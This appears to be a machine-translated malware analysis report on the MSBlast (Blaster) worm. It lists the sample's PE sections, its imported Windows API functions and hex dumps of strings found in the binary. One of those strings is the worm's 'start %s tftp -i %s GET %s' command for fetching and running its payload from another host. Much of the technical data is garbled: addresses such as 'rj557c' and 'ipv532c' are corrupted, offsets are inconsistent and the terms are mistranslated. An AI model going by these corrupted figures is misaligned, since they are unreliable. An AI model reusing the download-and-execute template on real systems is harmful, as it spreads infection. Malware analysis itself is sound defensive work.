Shock Wave (MSBlast) virus Analysis Report

In a few days, I wrote an article about the popular virus impact wave (msblast.exe). In this article, I did not describe it in more detail. As a result, many netizens think that my article is Copy + Paste, and I am indeed uncomfortable. The purpose of this article is to make it easier to analyze viruses in the future and take notes on Virus analysis by yourself. On the other hand, Chinese security vendors have not published more specific virus analysis reports, so I wrote this article. After reading this article, you can tell me where I am wrong. Thank you! Microsoft provides security patches for this vulnerability download asp "> http://www.microsoft.com/technet/treeview? Url =/technet/security/bulletin/MS03-026.asp

Virus shelling
On May 12, August, an emergency report was received from a company at, during which the company suffered an unknown worm attack. After processing, I retrieve the virus sample at pm.
Msblast.exe is taken after the sample is retrieved. The number of bytes is 6176 bytes. By using winhex msblast.exe, it is found that the number of bytes is 11296 bytes after the sixteen bytes are shelled.

Virus analysis
Use w32dsmto open msblast.exe to analyze the specific information of the virus PE file, which is of great help to analyze the virus in the following sections.
* *********************************** Anti-assembler msblast.exe *** ************************************
Disassembly of file: msblast.exe * Name of the Disassembly file: msblast.exe
Code Offset = 00000400 Code Size = 00001458 * Code Offset: 00000400 Code Size = 00001458
Data Offset = 100001a00 Data Size = 0000088C * Data Offset: 100001a00 Data Size = 0000088C

Number of Objects = 0004 (dec) Imagebase = 00400000 h
* Total objects = 0004 (dec) base address = 00400000 h

Object01:. text RVA: 00001000 Offset: 00000400 Size: 00001458 Flags: 60000020
Object02:. bss RVA: 00003000 Offset: 00000000 Size: 00000000 Flags: C0000080
Object03:. data RVA: 00004000 Offset: 100001a00 Size: 0000088C Flags: C0000040
Object04:. idata RVA: 00005000 Offset: 00002400 Size: 000006C0 Flags: C0000060

* Object01:. text: 00001000 offset: 00000400 size: 00001458 tag bit: 60000020
* Object02:. bss relative virtual address: 00003000 offset: 00000000 size: 00000000 tag bit: C0000080
* Object03:. data relative virtual address: 00004000 offset: 100001a00 size: 0000088C tag bit: C0000040
* Object04:. idata relative virtual address: 00005000 offset: 00002400 size: 000006C0 tag bit: C0000060
* This article contains * Explanations for your reference only.
**************************************** **************************************** ************
You can obtain the data executed by the virus in the memory from the above data. The virus PE file is divided into four blocks: text, bss, data, and idata. The entry point of the virus after shelling is 11CBh.

MSBlast.exe calls a total of five DLL modules and 53 Win32 API functions. Five DLL modules are KERNEL32.DLL, ADVAPI32.DLL, CRTDLL. DLL, WININET. DLL, and WS2_32.DLL. For 53 Win32 API functions, refer to the following disassembly data.

**************************************** **************************************** ************
++ Imported functions ++
Number of Imported Modules = 5 (decimal)

Import Module 001: KERNEL32.DLL
Import Module 002: ADVAPI32.DLL
Import Module 003: CRTDLL. DLL
Import Module 004: WININET. DLL
Import Module 005: WS2_32.DLL

++ Import module details ++

Import Module 001: KERNEL32.DLL

Addr: 201753e8 hint (0000) Name: ExitProcess
Addr: 201753f8 hint (0000) Name: ExitThread
Ad Dr: 00005408 hint (0000) Name: GetCommandLineA
Addr: 2017541c hint (0000) Name: GetDateFormatA
Adddr: 00005430 hint (0000) Name: GetLastError
Addr: 00005440 hint (0000) Name: GetModuleFileNameA
Adddr: 00005458 hint (0000) Name: GetModuleHandleA
Addr: 127546c hint (0000) Name: CloseHandle
Addr: 2017547c hint (0000) Name: GetTickCount
Addr: 2017548c hint (0000) Name: RtlUnwind
Addr: 00005498 hint (0000) Name: CreateMutexA
Addr: 12754a8 hint (0000) Name: Sleep
Addr: 201754b0 hint (0000) Name: TerminateThread
Addr: 201754c4 hint (0000) Name: CreateThread

Import Module 002: ADVAPI32.DLL

Addr: 12754d4 hint (0000) Name: RegCloseKey
Addr: 12754e4 hint (0000) Name: RegCreateKeyExA
Addr: 12754f8 hint (0000) Name: RegSetValueExA

Import Module 003: CRTDLL. DLL

Addr: Running 550c hint (0000) Name: _ GetMainArgs
Addr: 127551c hint (0000) Name: atoi
Addr: 00005524 hint (0000) Name: exit
Addr: 415552c hint (0000) Name: fclose
Addr: 00005538 hint (0000) Name: fopen
Addr: 00005540 hint (0000) Name: fread
Adddr: 00005548 hint (0000) Name: memcpy
Addr: 00005554 hint (0000) Name: memset
Addr: 00005560 hint (0000) Name: raise
Addr: 00005568 hint (0000) Name: rand
Ad Dr: 00005570 hint (0000) Name: signal
Addr: rj557c hint (0000) Name: sprintf
Addr: 00005588 hint (0000) Name: srand
Ad Dr: 00005590 hint (0000) Name: strchr
Addr: rj559c hint (0000) Name: strtok

Import Module 004: WININET. DLL

Addr: 201753cc hint (0000) Name: InternetGetConnectedState

Import Module 005: WS2_32.DLL

Addr: 201752c0 hint (0000) Name: htons
Addr: 201752c8 hint (0000) Name: ioctlsocket
Addr: 201752d8 hint (0000) Name: inet_addr
Addr: 201752e4 hint (0000) Name: inet_ntoa
Addr: 201752f0 hint (0000) Name: recvfrom
Addr: rj52fc hint (0000) Name: select
Addr: 00005308 hint (0000) Name: send
Addr: 00005310 hint (0000) Name: sendto
Addr: 2017531c hint (0000) Name: setsockopt
Addr: ipv532c hint (0000) Name: socket
Addr: 00005338 hint (0000) Name: gethostbyname
Addr: 00005348 hint (0000) Name: bind
Addr: 00005350 hint (0000) Name: gethostname
Addr: 00005360 hint (0000) Name: closesocket
Addr: 00005370 hint (0000) Name: WSAStartup
Adddr: 00005380 hint (0000) Name: WSACleanup
Addr: 00005390 hint (0000) Name: connect
Addr: 2017539c hint (0000) Name: getpeername
Addr: rj53ac hint (0000) Name: getsockname
Addr: rj53bc hint (0000) Name: WSASocketA

++ Exported functions ++
Number of Exported Functions = 0000 (decimal)
**************************************** **************************************** ************

After reading the Win32 API functions above, you may understand the APIS called by viruses. If you are not familiar with API functions, refer to MSDN for more details. You will be familiar with every virus action by understanding the API functions.

The above analysis is a disassembly analysis, and the following part is to use Winhex to view the virus hexadecimal format. Because MSBlast. EXE virus variants are not widely used, the following hexadecimal analysis content is basically consistent with the analysis by professional staff of other security vendors.

**************************************** **************************************** ************
49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 20 53 41 4E 21 21 00 62 69 6C 6C 79 20 67 61 74 65 73 20 77 68 20 64 6F 20 79 6F 75 20 6D 61 6B 65 20 74 68 69 73 20 70 6F 73 73 69 62 6C 65 20 3F 20 53 74 6F 70 20 6D 61 6B 69 6E 67 20 6D 6F 6E 65 79 20 61 6E 64 20 66 69 78 20 79 6F 75 72 20 73 6F 66 74 77 61 72 65 21 21 00

* Using Winhex to view the hexadecimal format, we can find that the hexadecimal ASCII format with the offset of 1_1a40 is converted to the plain text:
I just want to say LOVE YOU SAN !! Billy gates why do you make this possible? Stop making money and fix your software !!
**************************************** **************************************** ************

**************************************** **************************************** ************
77 69 6E 64 6F 77 73 70 64 61 74 65 2E 63 6F 6D

* Use Winhex to view the hexadecimal format, and find that the hexadecimal ASCII format with the offset of 12721e0 is converted to the plaintext:
Windowsupdate.com
**************************************** **************************************** ************

**************************************** **************************************** ************
73 74 61 72 74 20 25 73 0A 00 74 66 74 70 20 2D 69 20 25 73 20 47 45 54 20 25 73

* Use Winhex to view the hexadecimal format. It is found that the hexadecimal format with an offset of 00002200, where % s is the variable. ASCII to plaintext:
Start % s tftp-I % s GET % s
**************************************** **************************************** ************

**************************************** **************************************** ************
77 69 6E 64 6F 77 73 20 61 75 74 6F 20 75 70 64 61 74 65 00 53 4F 46 54 57 41 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E